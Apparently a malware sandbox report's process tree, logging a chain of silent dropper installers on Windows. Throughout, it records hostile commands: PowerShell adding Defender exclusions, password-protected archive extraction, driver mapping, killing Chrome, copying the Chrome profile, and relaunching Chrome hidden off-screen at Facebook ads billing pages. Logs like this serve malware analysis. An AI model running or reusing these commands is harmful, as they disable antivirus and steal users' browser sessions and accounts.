C:\Users\Admin\AppData\Local\Temp\uziran2p.ysu\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\uziran2p.ysu\privacytools5.exe34⤵
-
C:\Users\Admin\AppData\Local\Temp\uziran2p.ysu\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\uziran2p.ysu\privacytools5.exe35⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\airyymra.op2\setup.exe /8-2222 & exit33⤵
-
C:\Users\Admin\AppData\Local\Temp\airyymra.op2\setup.exeC:\Users\Admin\AppData\Local\Temp\airyymra.op2\setup.exe /8-222234⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Restless-Grass"35⤵
-
-
C:\Program Files (x86)\Restless-Grass\7za.exe"C:\Program Files (x86)\Restless-Grass\7za.exe" e -p154.61.71.51 winamp-plugins.7z35⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Restless-Grass\setup.exe" -map "C:\Program Files (x86)\Restless-Grass\WinmonProcessMonitor.sys""35⤵
-
C:\Program Files (x86)\Restless-Grass\setup.exe"C:\Program Files (x86)\Restless-Grass\setup.exe" -map "C:\Program Files (x86)\Restless-Grass\WinmonProcessMonitor.sys"36⤵
-
-
-
C:\Program Files (x86)\Restless-Grass\7za.exe"C:\Program Files (x86)\Restless-Grass\7za.exe" e -p154.61.71.51 winamp.7z35⤵
-
-
C:\Program Files (x86)\Restless-Grass\setup.exe"C:\Program Files (x86)\Restless-Grass\setup.exe" /8-222235⤵
-
C:\Program Files (x86)\Restless-Grass\setup.exe"C:\Program Files (x86)\Restless-Grass\setup.exe" /8-222236⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cbdzsll4.ete\MultitimerFour.exe & exit33⤵
-
C:\Users\Admin\AppData\Local\Temp\cbdzsll4.ete\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\cbdzsll4.ete\MultitimerFour.exe34⤵
-
C:\Users\Admin\AppData\Local\Temp\ZQMKYS2MVH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ZQMKYS2MVH\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10435⤵
-
C:\Users\Admin\AppData\Local\Temp\ZQMKYS2MVH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ZQMKYS2MVH\multitimer.exe" 1 3.1615354111.604858ff42696 10436⤵
-
C:\Users\Admin\AppData\Local\Temp\ZQMKYS2MVH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ZQMKYS2MVH\multitimer.exe" 2 3.1615354111.604858ff4269637⤵
-
C:\Users\Admin\AppData\Local\Temp\ihswabyptti\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\ihswabyptti\askinstall24.exe"38⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe39⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe40⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y39⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/39⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2040⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1700 /prefetch:840⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1652 /prefetch:240⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2224 /prefetch:840⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2812 /prefetch:140⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2804 /prefetch:140⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:140⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:140⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:140⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:140⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:140⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:140⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:140⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2232 /prefetch:840⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\grslpt0ftab\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\grslpt0ftab\Setup3310.exe" /Verysilent /subid=57738⤵
-
C:\Users\Admin\AppData\Local\Temp\is-UE837.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-UE837.tmp\Setup3310.tmp" /SL5="$806BC,802346,56832,C:\Users\Admin\AppData\Local\Temp\grslpt0ftab\Setup3310.exe" /Verysilent /subid=57739⤵
-
C:\Users\Admin\AppData\Local\Temp\is-K408N.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-K408N.tmp\Setup.exe" /Verysilent40⤵
-
C:\Users\Admin\AppData\Local\Temp\is-H5D8V.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-H5D8V.tmp\Setup.tmp" /SL5="$306CE,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-K408N.tmp\Setup.exe" /Verysilent41⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\Messure.exe"C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\Messure.exe" /Verysilent42⤵
-
C:\Users\Admin\AppData\Local\Temp\is-M5PFD.tmp\Messure.tmp"C:\Users\Admin\AppData\Local\Temp\is-M5PFD.tmp\Messure.tmp" /SL5="$306A0,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\Messure.exe" /Verysilent43⤵
-
C:\Users\Admin\AppData\Local\Temp\is-0UB26.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0UB26.tmp\Setup.exe" /VERYSILENT44⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\PictureLAb.exe" /Verysilent42⤵
-
C:\Users\Admin\AppData\Local\Temp\is-LB6H8.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-LB6H8.tmp\PictureLAb.tmp" /SL5="$406A0,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\PictureLAb.exe" /Verysilent43⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2TUSM.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-2TUSM.tmp\Setup.exe" /VERYSILENT44⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CLINC.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-CLINC.tmp\Setup.tmp" /SL5="$407EC,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-2TUSM.tmp\Setup.exe" /VERYSILENT45⤵
-
C:\Users\Admin\AppData\Local\Temp\is-MGAHS.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-MGAHS.tmp\def.exe" /S /UID=lab21446⤵
-
C:\Users\Admin\AppData\Local\Temp\a5-4b037-0ab-cd79d-774646559868c\Cehihapipae.exe"C:\Users\Admin\AppData\Local\Temp\a5-4b037-0ab-cd79d-774646559868c\Cehihapipae.exe"47⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4imhxiex.b2y\md7_7dfj.exe & exit48⤵
-
C:\Users\Admin\AppData\Local\Temp\4imhxiex.b2y\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\4imhxiex.b2y\md7_7dfj.exe49⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a3xysltr.mnj\askinstall18.exe & exit48⤵
-
C:\Users\Admin\AppData\Local\Temp\a3xysltr.mnj\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\a3xysltr.mnj\askinstall18.exe49⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe50⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe51⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y50⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/50⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1908 /prefetch:851⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1896 /prefetch:851⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2844 /prefetch:151⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2828 /prefetch:151⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:151⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:151⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:151⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1848 /prefetch:251⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:151⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:151⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:151⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:151⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1672 /prefetch:851⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=6044 /prefetch:851⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zgsu3snm.ju3\customer4.exe & exit48⤵
-
C:\Users\Admin\AppData\Local\Temp\zgsu3snm.ju3\customer4.exeC:\Users\Admin\AppData\Local\Temp\zgsu3snm.ju3\customer4.exe49⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"50⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\chryl4fk.p1v\GcleanerWW.exe /mixone & exit48⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ukl4qqiz.cot\privacytools5.exe & exit48⤵
-
C:\Users\Admin\AppData\Local\Temp\ukl4qqiz.cot\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\ukl4qqiz.cot\privacytools5.exe49⤵
-
C:\Users\Admin\AppData\Local\Temp\ukl4qqiz.cot\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\ukl4qqiz.cot\privacytools5.exe50⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fktzlgsd.dtu\setup.exe /8-2222 & exit48⤵
-
C:\Users\Admin\AppData\Local\Temp\fktzlgsd.dtu\setup.exeC:\Users\Admin\AppData\Local\Temp\fktzlgsd.dtu\setup.exe /8-222249⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Shy-Cloud"50⤵
-
-
C:\Program Files (x86)\Shy-Cloud\7za.exe"C:\Program Files (x86)\Shy-Cloud\7za.exe" e -p154.61.71.51 winamp-plugins.7z50⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Shy-Cloud\setup.exe" -map "C:\Program Files (x86)\Shy-Cloud\WinmonProcessMonitor.sys""50⤵
-
C:\Program Files (x86)\Shy-Cloud\setup.exe"C:\Program Files (x86)\Shy-Cloud\setup.exe" -map "C:\Program Files (x86)\Shy-Cloud\WinmonProcessMonitor.sys"51⤵
-
-
-
C:\Program Files (x86)\Shy-Cloud\7za.exe"C:\Program Files (x86)\Shy-Cloud\7za.exe" e -p154.61.71.51 winamp.7z50⤵
-
-
C:\Program Files (x86)\Shy-Cloud\setup.exe"C:\Program Files (x86)\Shy-Cloud\setup.exe" /8-222250⤵
-
C:\Program Files (x86)\Shy-Cloud\setup.exe"C:\Program Files (x86)\Shy-Cloud\setup.exe" /8-222251⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s5eeqspl.e2w\MultitimerFour.exe & exit48⤵
-
C:\Users\Admin\AppData\Local\Temp\s5eeqspl.e2w\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\s5eeqspl.e2w\MultitimerFour.exe49⤵
-
C:\Users\Admin\AppData\Local\Temp\FY0XCTDDM0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\FY0XCTDDM0\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10450⤵
-
C:\Users\Admin\AppData\Local\Temp\FY0XCTDDM0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\FY0XCTDDM0\multitimer.exe" 1 3.1615354221.6048596d6db15 10451⤵
-
C:\Users\Admin\AppData\Local\Temp\FY0XCTDDM0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\FY0XCTDDM0\multitimer.exe" 2 3.1615354221.6048596d6db1552⤵
-
C:\Users\Admin\AppData\Local\Temp\4am4kpt4vzk\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\4am4kpt4vzk\Setup3310.exe" /Verysilent /subid=57753⤵
-
C:\Users\Admin\AppData\Local\Temp\is-00DHP.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-00DHP.tmp\Setup3310.tmp" /SL5="$15039C,802346,56832,C:\Users\Admin\AppData\Local\Temp\4am4kpt4vzk\Setup3310.exe" /Verysilent /subid=57754⤵
-
C:\Users\Admin\AppData\Local\Temp\is-AC6CD.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-AC6CD.tmp\Setup.exe" /Verysilent55⤵
-
C:\Users\Admin\AppData\Local\Temp\is-TFJJB.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-TFJJB.tmp\Setup.tmp" /SL5="$A07EA,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-AC6CD.tmp\Setup.exe" /Verysilent56⤵
-
C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\Messure.exe"C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\Messure.exe" /Verysilent57⤵
-
C:\Users\Admin\AppData\Local\Temp\is-RBO1L.tmp\Messure.tmp"C:\Users\Admin\AppData\Local\Temp\is-RBO1L.tmp\Messure.tmp" /SL5="$40844,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\Messure.exe" /Verysilent58⤵
-
C:\Users\Admin\AppData\Local\Temp\is-TI6I8.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-TI6I8.tmp\Setup.exe" /VERYSILENT59⤵
-
C:\ProgramData\3GzhBdrEazKFpDWZPQsyJa7TxsUGTNMcb2FDh.tmpC:\ProgramData\3GzhBdrEazKFpDWZPQsyJa7TxsUGTNMcb2FDh.tmp60⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\PictureLAb.exe" /Verysilent57⤵
-
C:\Users\Admin\AppData\Local\Temp\is-NBPD6.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-NBPD6.tmp\PictureLAb.tmp" /SL5="$50844,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\PictureLAb.exe" /Verysilent58⤵
-
C:\Users\Admin\AppData\Local\Temp\is-EEEJ1.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-EEEJ1.tmp\Setup.exe" /VERYSILENT59⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SN7MV.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-SN7MV.tmp\Setup.tmp" /SL5="$6034A,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-EEEJ1.tmp\Setup.exe" /VERYSILENT60⤵
-
C:\Users\Admin\AppData\Local\Temp\is-7MC1O.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-7MC1O.tmp\def.exe" /S /UID=lab21461⤵
-
C:\Users\Admin\AppData\Local\Temp\54-63e84-f0b-10db8-acfd97138402d\Mycedivyhy.exe"C:\Users\Admin\AppData\Local\Temp\54-63e84-f0b-10db8-acfd97138402d\Mycedivyhy.exe"62⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rtk5opq1.hft\md7_7dfj.exe & exit63⤵
-
C:\Users\Admin\AppData\Local\Temp\rtk5opq1.hft\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\rtk5opq1.hft\md7_7dfj.exe64⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\22uqbh2d.mqh\askinstall18.exe & exit63⤵
-
C:\Users\Admin\AppData\Local\Temp\22uqbh2d.mqh\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\22uqbh2d.mqh\askinstall18.exe64⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe65⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe66⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y65⤵
-
-
